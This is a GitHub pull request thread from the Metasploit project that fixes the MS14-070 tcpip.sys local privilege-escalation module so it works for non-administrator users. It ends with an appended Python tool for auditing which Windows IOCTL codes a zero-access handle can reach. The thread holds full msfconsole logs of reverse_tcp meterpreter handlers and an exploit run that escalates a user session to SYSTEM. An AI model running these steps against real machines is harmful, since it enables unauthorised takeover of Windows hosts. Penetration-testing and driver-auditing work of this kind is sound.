
Fixed open device issue for non-priv users #4791

Merged
merged 1 commit into from Feb 18, 2015

Conversation

KoreLogicSecurity

Fixed the open_device call to work for users without Administrator
privileges

Example run:

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 10.0.2.2
LHOST => 10.0.2.2
msf exploit(handler) > set LPORT 4445
LPORT => 4445
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LHOST     10.0.2.2         yes       The listen address
   LPORT     4445             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j
[*] Exploit running as background job.

[-] Handler failed to bind to 10.0.2.2:4445
[*] Started reverse handler on 0.0.0.0:4445
[*] Starting the payload handler...
msf exploit(handler) > [*] Sending stage (770048 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:4445 -> 127.0.0.1:54433) at 2015-02-18 12:41:59 -0500

msf exploit(handler) > sessions -l

Active sessions
===============

  Id  Type                   Information                   Connection
  --  ----                   -----------                   ----------
  1   meterpreter x86/win32  WIN2K3TEST\kore @ WIN2K3TEST  127.0.0.1:4445 -> 127.0.0.1:54433 (127.0.0.1)

msf exploit(handler) > use exploit/windows/local/ms14_070_tcpip_ioctl
msf exploit(ms14_070_tcpip_ioctl) > set SESSION 1
SESSION => 1
msf exploit(ms14_070_tcpip_ioctl) > exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on 0.0.0.:4444
msf exploit(ms14_070_tcpip_ioctl) > [*] Storing the shellcode in memory...
[*] Triggering the vulnerability...
[*] Checking privileges after exploitation...
[+] Exploitation successful!
[*] Sending stage (770048 bytes) to 127.0.0.1
[*] Meterpreter session 2 opened (127.0.0.1:4444 -> 127.0.0.1:36587) at 2015-02-18 12:43:02 -0500
msf exploit(ms14_070_tcpip_ioctl) > sessions -l

Active sessions
===============

  Id  Type                   Information                       Connection
  --  ----                   -----------                       ----------
  1   meterpreter x86/win32  WIN2K3TEST\kore @ WIN2K3TEST      127.0.0.1:4445 -> 127.0.0.1:54433 (127.0.0.1)
  2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ WIN2K3TEST  127.0.0.1:4444 -> 127.0.0.1:36587 (127.0.0.1)

msf exploit(ms14_070_tcpip_ioctl) >

@zeroSteiner

The open_device arguments make more sense now (desired_access 0 and share_mode of 'FILE_SHARE_READ'). The module's exploit and check methods are both working as a user with fewer privileges than before.

msf-git (S:1 J:1) exploit(ms14_070_tcpip_ioctl) > check

[-] [2015.02.18-17:10:05] Failed to open the \\.\tcp device (error: 5 Access is denied.)
[*] 192.168.90.142 - The target is not exploitable.
msf-git (S:1 J:1) exploit(ms14_070_tcpip_ioctl) > reload
[*] Reloading module...
msf-git (S:1 J:1) exploit(ms14_070_tcpip_ioctl) > check

[*] [2015.02.18-17:10:54] tcpip.sys file version: 5.2.3790.4573 branch: 45
[+] 192.168.90.142 - The target is vulnerable.
msf-git (S:1 J:1) exploit(ms14_070_tcpip_ioctl) > exploit

[*] [2015.02.18-17:10:59] Started reverse handler on 172.20.220.153:4444
[*] [2015.02.18-17:11:01] tcpip.sys file version: 5.2.3790.4573 branch: 45
[*] [2015.02.18-17:11:01] Storing the shellcode in memory...
[*] [2015.02.18-17:11:02] Triggering the vulnerability...
[*] [2015.02.18-17:11:02] Checking privileges after exploitation...
[+] [2015.02.18-17:11:03] Exploitation successful!
[*] [2015.02.18-17:11:03] Creating the thread to execute in 0x16a0000 (pid=3564)
[*] [2015.02.18-17:11:03] Sending stage (770048 bytes) to 172.20.220.153
[*] Meterpreter session 3 opened (172.20.220.153:4444 -> 172.20.220.153:56301) at 2015-02-18 17:11:05 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

Will land this in just a minute.

@zeroSteiner zeroSteiner merged commit e40772e into rapid7:master Feb 18, 2015
zeroSteiner added a commit that referenced this pull request Feb 18, 2015
The arguments to CreateFileA used to require that the user had
some level of access on the \\.\tcp device.
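The commit message and the comment above come down to one Windows rule worth making explicit for anyone reviewing a driver: CreateFileA with dwDesiredAccess = 0 returns a handle that was granted no read or write rights, and the I/O manager only rejects an IOCTL on such a handle when the control code itself encodes FILE_READ_ACCESS or FILE_WRITE_ACCESS. A code defined with FILE_ANY_ACCESS passes that check, so the driver's own dispatch routine is the only place a privilege check can happen. The Python below is an added example, not code from this pull request or from Metasploit, and it generalises from the desired_access 0 change to the CTL_CODE layout behind it: it decodes control codes and reports which of a list would be reachable from a zero-access handle. The two IOCTL_DISK_* values are the public constants from ntdddisk.h; the 0x8000 device type and its function number are constructed placeholders, not the code used by the module.

```python
"""Decode Windows I/O control codes and report which ones the I/O manager
would let through on a handle opened with dwDesiredAccess = 0.

Added example; assumes the documented CTL_CODE layout from the Windows DDK:
    (DeviceType << 16) | (RequiredAccess << 14) | (Function << 2) | Method
"""

FILE_ANY_ACCESS = 0
FILE_READ_ACCESS = 1
FILE_WRITE_ACCESS = 2

METHODS = {
    0: "METHOD_BUFFERED",
    1: "METHOD_IN_DIRECT",
    2: "METHOD_OUT_DIRECT",
    3: "METHOD_NEITHER",
}


def ctl_code(device_type, function, method, access):
    """Build a control code the way the CTL_CODE macro does."""
    return (device_type << 16) | (access << 14) | (function << 2) | method


def decode_ioctl(code):
    """Split a control code back into its four fields."""
    return {
        "device_type": (code >> 16) & 0xFFFF,
        "required_access": (code >> 14) & 0x3,
        "function": (code >> 2) & 0xFFF,
        "method": METHODS[code & 0x3],
    }


def reachable_with_handle(code, granted_access):
    """True if a handle granted `granted_access` (bitmask of FILE_READ_ACCESS
    and FILE_WRITE_ACCESS) satisfies the access field of `code`.  A handle
    from CreateFileA(..., dwDesiredAccess=0, ...) has granted_access == 0,
    so only FILE_ANY_ACCESS codes pass; the driver must gate those itself."""
    required = decode_ioctl(code)["required_access"]
    return (required & ~granted_access) == 0


def audit(codes, granted_access=0):
    """Return the IOCTLs in `codes` reachable from a handle with that access."""
    return [c for c in codes if reachable_with_handle(c, granted_access)]


# Public codes from ntdddisk.h (FILE_DEVICE_DISK == 7) plus one constructed
# placeholder on a vendor device type (0x8000 and above are reserved for
# third parties); the placeholder is not the code used by the module.
IOCTL_DISK_GET_DRIVE_GEOMETRY = ctl_code(7, 0x0, 0, FILE_ANY_ACCESS)
IOCTL_DISK_SET_PARTITION_INFO = ctl_code(7, 0x8, 0, FILE_READ_ACCESS | FILE_WRITE_ACCESS)
HYPOTHETICAL_VENDOR_IOCTL = ctl_code(0x8000, 0x801, 3, FILE_ANY_ACCESS)

if __name__ == "__main__":
    for code in (IOCTL_DISK_GET_DRIVE_GEOMETRY, IOCTL_DISK_SET_PARTITION_INFO, HYPOTHETICAL_VENDOR_IOCTL):
        fields = decode_ioctl(code)
        print(f"0x{code:08X} {fields} reachable with zero-access handle: "
              f"{reachable_with_handle(code, 0)}")
```

When auditing a driver, run `audit()` over every code its dispatch routine accepts with `granted_access=0`; each code that comes back is one the dispatch routine has to authorise on its own, because the device DACL and the handle's access mask will not do it.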